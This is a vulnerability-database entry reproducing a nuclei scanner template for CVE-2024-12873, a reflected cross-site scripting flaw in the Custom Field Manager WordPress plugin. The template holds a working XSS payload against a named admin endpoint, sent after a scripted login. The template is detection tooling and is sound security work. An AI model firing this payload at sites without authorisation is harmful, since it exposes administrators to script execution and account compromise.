Lucene search
K

Custom Field Manager WordPress - Cross-Site Scripting

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 7 Views

Custom Field Manager for WordPress 1.0 has reflected XSS enabling admin script execution.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-12873
6 Feb 202615:51
circl
CNNVD
WordPress plugin Custom Field Manager 安全漏洞
15 May 202500:00
cnnvd
CVE
CVE-2024-12873
15 May 202520:06
cve
Cvelist
CVE-2024-12873 Custom Field Manager <= 1.0 - Reflected XSS Vulnerability
15 May 202520:06
cvelist
EUVD
EUVD-2025-15328
3 Oct 202520:07
euvd
NVD
CVE-2024-12873
15 May 202520:15
nvd
OSV
CVE-2024-12873
15 May 202520:15
osv
Patchstack
WordPress Custom Field Manager plugin <= 1.0 - Reflected XSS Vulnerability vulnerability
19 May 202500:42
patchstack
Positive Technologies
PT-2025-21447
15 May 202500:00
ptsecurity
RedhatCVE
CVE-2024-12873
17 May 202521:04
redhatcve
Rows per page
id: CVE-2024-12873

info:
  name: Custom Field Manager WordPress - Cross-Site Scripting
  author: Sourabh-Sahu
  severity: medium
  description: |
    Custom Field Manager WordPress plugin through 1.0 contains a reflected XSS caused by unsanitized and unescaped parameter output, letting attackers execute scripts against high privilege users such as admin, exploit requires crafted request.
  impact: |
    Attackers can execute scripts in admin users' browsers, potentially leading to account compromise or unauthorized actions.
  remediation: |
    Update to the latest version with proper sanitization and escaping.
  reference:
    - https://wpscan.com/vulnerability/3e82d45f-7b8f-424e-a8d7-be64f5acf65e/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-12873
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-12873
    cwe-id: CWE-79
    epss-score: 0.0053
    epss-percentile: 0.40926
    cpe: cpe:2.3:a:f1logic:custom_field_manager:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: f1logic
    product: custom_field_manager
  tags: cve,cve2024,f1logic,custom-field-manager,authenticated,wordpress,wp,wp-plugin,xss

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=custom-field-manager-customfields&taxonomy=testxss%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cscript%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, "text/html")
          - contains_all(body, "</script><script>alert(document.domain)</script><script>","custom-field-manager")
        condition: and
# digest: 4a0a00473045022027c0b325e04373002c045f69f4ae5ce763475c09f6ad3cff9ff953577d85f21c022100c12a3742caa81e4e282608f220eb3a3f5bcbccff20aa8b5bf711a09f12156615:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Feb 2026 15:51Current
7.2High risk
Vulners AI Score7.2
CVSS 3.16.1
EPSS0.0053
SSVC
7